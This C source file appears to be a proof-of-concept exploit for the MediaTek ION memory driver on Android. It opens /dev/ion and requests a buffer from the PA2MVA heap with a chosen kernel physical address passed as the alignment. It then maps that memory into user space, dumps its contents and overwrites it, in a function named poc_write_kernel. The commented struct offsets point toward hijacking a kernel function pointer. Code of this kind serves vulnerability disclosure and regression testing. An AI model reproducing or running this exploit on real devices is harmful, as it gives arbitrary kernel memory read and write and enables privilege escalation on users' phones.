#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define FAIL_CHECK_ALOGE(condition, error_message) \ if (!(condition)) { \ ALOGE("Check failed: " #error_message " " #condition " Line: %d", \ __LINE__); \ exit(EXIT_FAILURE); \ } typedef unsigned int u32; typedef unsigned long u64; #define ION_IOC_MAGIC 'I' #define _IOC_NRBITS 8 #define _IOC_TYPEBITS 8 /* * Let any architecture override either of the following before * including this file. */ #ifndef _IOC_SIZEBITS # define _IOC_SIZEBITS 14 #endif #ifndef _IOC_DIRBITS # define _IOC_DIRBITS 2 #endif #define _IOC_NRMASK ((1 << _IOC_NRBITS)-1) #define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1) #define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1) #define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1) #define _IOC_NRSHIFT 0 #define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS) #define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS) #define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS) #ifndef _IOC_NONE # define _IOC_NONE 0U #endif #ifndef _IOC_WRITE # define _IOC_WRITE 1U #endif #ifndef _IOC_READ # define _IOC_READ 2U #endif #define _IOC(dir,type,nr,size) \ (((dir) << _IOC_DIRSHIFT) | \ ((type) << _IOC_TYPESHIFT) | \ ((nr) << _IOC_NRSHIFT) | \ ((size) << _IOC_SIZESHIFT)) #ifndef __KERNEL__ #define _IOC_TYPECHECK(t) (sizeof(t)) #endif /* used to create numbers */ #define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0) #define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size))) #define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size))) #define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size))) /* Structure definitions */ enum ION_CMDS { ION_CMD_SYSTEM, ION_CMD_MULTIMEDIA, ION_CMD_MULTIMEDIA_SEC }; struct ion_custom_data { unsigned int cmd; unsigned long arg; }; struct ion_fd_data { int handle; int fd; }; struct ion_allocation_data { size_t len; size_t align; unsigned int heap_id_mask; unsigned int flags; int handle; }; struct ion_handle_data { int handle; }; struct ion_heap_query { __u32 cnt; /* Total number of heaps to be copied */ __u32 reserved0; /* align to 64bits */ __u64 heaps; /* buffer to be populated */ __u32 reserved1; __u32 reserved2; }; enum ION_CACHE_SYNC_TYPE { ION_CACHE_CLEAN_BY_RANGE, ION_CACHE_INVALID_BY_RANGE, ION_CACHE_FLUSH_BY_RANGE, ION_CACHE_CLEAN_BY_RANGE_USE_VA, ION_CACHE_INVALID_BY_RANGE_USE_VA, ION_CACHE_FLUSH_BY_RANGE_USE_VA, ION_CACHE_CLEAN_ALL, ION_CACHE_INVALID_ALL, ION_CACHE_FLUSH_ALL }; enum ION_SYS_CMDS { ION_SYS_CACHE_SYNC, ION_SYS_GET_PHYS, ION_SYS_GET_CLIENT, ION_SYS_SET_HANDLE_BACKTRACE, ION_SYS_SET_CLIENT_NAME, ION_SYS_DMA_OP, }; struct ion_sys_cache_sync_param { union { int handle; void *kernel_handle; }; void *va; unsigned int size; enum ION_CACHE_SYNC_TYPE sync_type; }; struct ion_sys_get_phys_param { union { int handle; void *kernel_handle; }; unsigned int phy_addr; unsigned long len; }; struct ion_sys_get_client_param { unsigned int client; }; #define ION_MM_DBG_NAME_LEN 48 #define ION_MM_SF_BUF_INFO_LEN 16 struct ion_sys_client_name { char name[ION_MM_DBG_NAME_LEN]; }; #define BACKTRACE_SIZE 10 struct ion_sys_record_param { pid_t group_id; pid_t pid; unsigned int action; unsigned int address_type; unsigned int address; unsigned int length; unsigned int backtrace[BACKTRACE_SIZE]; unsigned int backtrace_num; void *handle; void *client; void *buffer; void *file; int fd; }; enum ION_DMA_TYPE { ION_DMA_MAP_AREA, ION_DMA_UNMAP_AREA, ION_DMA_MAP_AREA_VA, ION_DMA_UNMAP_AREA_VA, ION_DMA_FLUSH_BY_RANGE, ION_DMA_FLUSH_BY_RANGE_USE_VA, ION_DMA_CACHE_FLUSH_ALL }; enum ION_DMA_DIR { ION_DMA_FROM_DEVICE, ION_DMA_TO_DEVICE, ION_DMA_BIDIRECTIONAL, }; struct ion_dma_param { union { int handle; void *kernel_handle; }; void *va; unsigned int size; enum ION_DMA_TYPE dma_type; enum ION_DMA_DIR dma_dir; }; #define ION_IOC_CUSTOM _IOWR(ION_IOC_MAGIC, 6, struct ion_custom_data) #define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \ struct ion_allocation_data) #define ION_IOC_MAP _IOWR(ION_IOC_MAGIC, 2, struct ion_fd_data) #define ION_IOC_SYNC _IOWR(ION_IOC_MAGIC, 7, struct ion_fd_data) #define ION_IOC_SHARE _IOWR(ION_IOC_MAGIC, 4, struct ion_fd_data) struct ion_sys_data { enum ION_SYS_CMDS sys_cmd; union { struct ion_sys_cache_sync_param cache_sync_param; struct ion_sys_get_phys_param get_phys_param; struct ion_sys_get_client_param get_client_param; struct ion_sys_client_name client_name_param; struct ion_sys_record_param record_param; struct ion_dma_param dma_param; }; }; union ion_ioctl_arg { struct ion_fd_data fd; struct ion_allocation_data allocation; struct ion_handle_data handle; struct ion_custom_data custom; struct ion_heap_query query; }; enum mtk_ion_heap_type { ION_HEAP_TYPE_MULTIMEDIA = 10, ION_HEAP_TYPE_FB = 11, ION_HEAP_TYPE_MULTIMEDIA_FOR_CAMERA = 12, ION_HEAP_TYPE_MULTIMEDIA_SEC = 13, ION_HEAP_TYPE_MULTIMEDIA_MAP_MVA = 14, ION_HEAP_TYPE_MULTIMEDIA_PA2MVA = 15, ION_HEAP_TYPE_MULTIMEDIA_PROT = 16, ION_HEAP_TYPE_MULTIMEDIA_2D_FR = 17, ION_HEAP_TYPE_MULTIMEDIA_WFD = 18, /* WARNING: DO NOT EDIT, AUTO-GENERATED CODE - SEE TOP FOR INSTRUCTIONS */ }; /* * mappings of this buffer should be cached, ion will do cache maintenance * when the buffer is mapped for dma */ #define ION_FLAG_CACHED 1 /* * mappings of this buffer will created at mmap time, if this is set * caches must be managed manually */ #define ION_FLAG_CACHED_NEEDS_SYNC 2 /* struct ion_client { struct rb_node node; struct ion_device *dev; struct rb_root handles; struct idr idr; struct mutex lock; const char *name; char *display_name; int display_serial; struct task_struct *task; pid_t pid; struct dentry *debug_root; char dbg_name[ION_MM_DBG_NAME_LEN]; }; */ // "dev" offset inside ion_client #define ion_device_OFF 12 /* struct ion_device { struct miscdevice dev; struct rb_root buffers; struct mutex buffer_lock; struct rw_semaphore lock; struct plist_head heaps; long (*custom_ioctl)(struct ion_client *client, unsigned int cmd, unsigned long arg); struct rb_root clients; struct dentry *debug_root; struct dentry *heaps_debug_root; struct dentry *clients_debug_root; }; */ //"custom_ioctl" offset inside #define custom_ioctl_OFF 100 int g_fd = -1; #define MMAP_SIZE 4096 //#define PAGE_SIZE 4096 int alloc_handle(int type, unsigned long kernel_obj_addr) { union ion_ioctl_arg iia; memset(&iia, 0, sizeof(iia)); iia.allocation.len = MMAP_SIZE; iia.allocation.align = kernel_obj_addr; iia.allocation.heap_id_mask = 1 << type; iia.allocation.flags = ION_FLAG_CACHED | ION_FLAG_CACHED_NEEDS_SYNC; FAIL_CHECK_ALOGE(ioctl(g_fd, ION_IOC_ALLOC, (unsigned long)&iia) >= 0, ION_IOC_ALLOC); ALOGE("ION_IOC_ALLOC success"); return iia.allocation.handle; } int poc_write_kernel() { g_fd = open("/dev/ion", 0x80000); FAIL_CHECK_ALOGE (g_fd >= 0, failed to open ion); ALOGE("[+] open /dev/ion"); int handle = alloc_handle(ION_HEAP_TYPE_MULTIMEDIA_PA2MVA, 0x40080000); FAIL_CHECK_ALOGE(handle >= 0, alloc_handle failed); union ion_ioctl_arg iia; memset(&iia, 0, sizeof(iia)); iia.fd.handle = handle; FAIL_CHECK_ALOGE (ioctl(g_fd, ION_IOC_SHARE, (unsigned long)&iia) >= 0, ION_IOC_SHARE); ALOGE("ION_IOC_SHARE handle success"); int dma_fd = iia.fd.fd; char *re_buf = (char*) mmap(NULL, MMAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0); FAIL_CHECK_ALOGE ((void *)re_buf != MAP_FAILED, mmap); ALOGE("re_buf addr:%p", re_buf); ALOGE("re_buf[0]:%x", re_buf[0]); unsigned long read_num = 0; int counter = 0; unsigned long *read_buf = (unsigned long *)re_buf; for (read_num = 0; read_num < MMAP_SIZE/sizeof(unsigned long); read_num++) { if (read_buf[read_num]) { //reduce number of log messages if(counter++ % 8 == 0){ ALOGE("read_buf[%lu]:0x%lx", read_num, read_buf[read_num]); } } } ALOGE("read_num = %lu", read_num); ALOGE("non zero = %d", counter); memset(re_buf, 0xbb, MMAP_SIZE); munmap(re_buf, MMAP_SIZE); close(dma_fd); close(g_fd); return 0; } int main() { poc_write_kernel(); ALOGE("test end"); return 0; }